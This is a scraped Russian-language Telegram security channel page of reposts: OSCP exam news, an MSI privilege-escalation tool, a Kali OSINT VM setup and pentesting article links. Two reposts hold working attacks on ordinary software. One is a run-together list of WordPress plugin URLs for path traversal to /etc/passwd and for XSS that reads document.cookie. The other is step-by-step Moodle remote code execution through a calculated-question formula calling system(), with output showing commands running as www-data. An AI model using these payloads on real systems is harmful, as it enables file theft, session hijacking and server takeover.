Вже доступно! Дослідження Telegram за 2025 — головні інсайти року 
Fsecurity | HH
Відкрити в Telegram
Канал про ИБ Наш Discord: https://discord.gg/Eg8aDS7Hn7 Пожертвовать: > https://www.donationalerts.com/r/xackapb
Показати більше2 012
Підписники
-124 години
-37 днів
-1130 день
Архів дописів
2 010
Repost from Pentester's Backlog
🔴 Ахтунг!
Offensive Security обновили формат сдачи своего самого популярного экзамена OSCP!
Начиная с 1го ноября 2024г. пользователи имеют право обновить свой сертификат до версии OSCP+ (действителен 3 года), подтверждающий что данный человек сдал актуальную программу экзамена и ничего не забыл
🥲 Станет невозможным получить 10 дополнительных экзаменационных баллов за решение всех лабораторных работ.
Помимо прочего, изменения в сдаче экзамена так же коснутся по части внутреннего пентеста Active Directory (подробнее на скриншоте).
Стоимость обновления сертификата OSCP -> OSCP+
200$ (до 1 апреля 2025 г., после - 799$).
2 010
Repost from Proxy Bar
Прекрасное в мире плагинов WordPress
*
simple-image-manipulator
/wp-content/plugins/./simple-image-manipulator/controller/download.php?filepath=/etc/passwd/wp-content/plugins/activehelper-livehelp/server/offline.php?MESSAGE=MESSAGE%3C%2Ftextarea%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&DOMAINID=DOMAINID&COMPLETE=COMPLETE&TITLE=TITLE&URL=URL&COMPANY=COMPANY&SERVER=SERVER&PHONE=PHONE&SECURITY=SECURITY&BCC=BCC&EMAIL=EMAIL%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&NAME=NAME%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&/wp-content/plugins/amministrazione-aperta/wpgov/dispatcher.php?open=../../../../../../../../../../etc/passwd/wp-content/plugins/anti-plagiarism/js.php?m=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ebuddypress-component-stats
/wp-content/plugins/buddypress-component-stats/lib/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwddzs-videogallery
/wp-content/plugins/dzs-videogallery/admin/upload.php/wp-content/plugins/e-search/tmpl/title_az.php?title_az=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Efancy-product-designer
/wp-content/plugins/fancy-product-designer/inc/custom-image-handler.phphd-webplayer
/wp-content/plugins/hd-webplayer/playlist.php/wp-content/plugins/localize-my-post/ajax/include.php?file=../../../../../../../../../../etc/passwd2 010
Repost from Caster
Релиз моей работы о безопасности уровня доступа компьютерной сети
Caster - Nihilism
Genre: Defensive
Label: exploit.org
Release Date: 31.08.2024
Performed by: Caster
Written by: Magama Bazarov
Mastered by: Magama Bazarov
Cover Man: Magama Bazarov (Sony ILCE-7M3, f/5.6, 1/3 sec)
https://blog.exploit.org/caster-nihilism
2 010
Repost from RedTeam brazzers
Всем привет! Давным-давно появился инструмент msi_search, который создали mandiant для анализа установленных MSI-файлов на системе. Впоследствии эти файлы можно было выкачать и проанализировать на предмет уязвимостей. Подобный вектор привеска достаточно не самый примитивный и обычный, однако, я не раз встречал интересные инсталляторы, которые нужно было как-то сломать :)
Сам формат MSI предательски похож на формат SQL, что упрощало написание автоматизированного чекера на уязвимости. Так родился инструмент MyMSIAnalyzer , я научил его:
- Обнаруживать оставленные учетные данные внутри MSI-файла
- Анализировать CustomActions на предмет наличия действий, исполняемых от лица системы
- Проверять возможность перезаписи CustomActions, что может использоваться как для повышения привилегий, так и закрепления
- Проверка сигнатур (нужно в контексте MST Backdoor), а также отдельная программа для обнаружения GUI внутри MSI, ведь в таком случае возможно осуществить побег в cmd.exe через запуск explorer.exe
Полный разбор MSI-файлов как вектора повышения привилегий я выложил на medium. Приятного чтения :))
2 010
Repost from Kali Linux
⭐️ Kali Linux OSINT VM
Виртуальная машина с 100+ инструментами OSINT.
Виртуальная машина Kali Linux, ориентированная на исследования в области OSINT.
Инструмент обладает широким функционалом и включает множество актуальных инструментов.
Помимо программного обеспечения, в ней представлен обширный набор различных шпаргалок, браузерных расширений, а также других ресурсов, которые окажутся полезными в расследованиях и работе с Kali Linux.
git clone https://github.com/midnit3Z0mbi3/Kali-Linux-OSINT-VM.git
chmod +x *.sh
sudo bash kali_osint_setup.sh
bash kali_osint_tools_pipx.sh
sudo bash snoint.sh
bash go.sh
🖥 Github
@linuxkalii2 010
Repost from purple shift
Мейнфреймы IBM на базе операционки z/OS могут показаться вымершими динозаврами из глубокого прошлого. Однако велики шансы, что в сердце ваших бизнес-процессов жужжат именно эти шкафы. Их можно встретить во многих крупных организациях, где требуется обработка большого количества транзакций (банки, биржи, аэропорты и др.)
Из-за высокой стоимости и узкой специализации мейнфреймы редко встречаются в проектах по анализу защищённости. Поэтому в публичном доступе очень мало знаний о том, как тестировать мейнфреймы на проникновение и как детектировать атаки на них.
Наш эксперт Денис Степанов собирает такие знания – всё, что понадобится пентестеру, чтобы получить контроль над мейнфреймом, повысить привилегии, найти возможные вектора для бокового перемещения и эксфильтровать данные:
https://securelist.ru/zos-mainframe-pentesting/110237/
2 010
Repost from Cybred
https://blog.redteam-pentesting.de/2024/moodle-rce/
RCE в системе, которую любят использовать вузы во всем мире.
1. Создать вычисляемый вопрос
2. Изменить формулу ответа на
(1)->{system($_GET[chr(97)])}
3. Сохранить
4. Добавить к URL &a=id или любую другую команду
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
<!DOCTYPE html>
<html dir="ltr" lang="en" xml:lang="en">
<head>
<title>Editing a Calculated question | Test</title>
[...]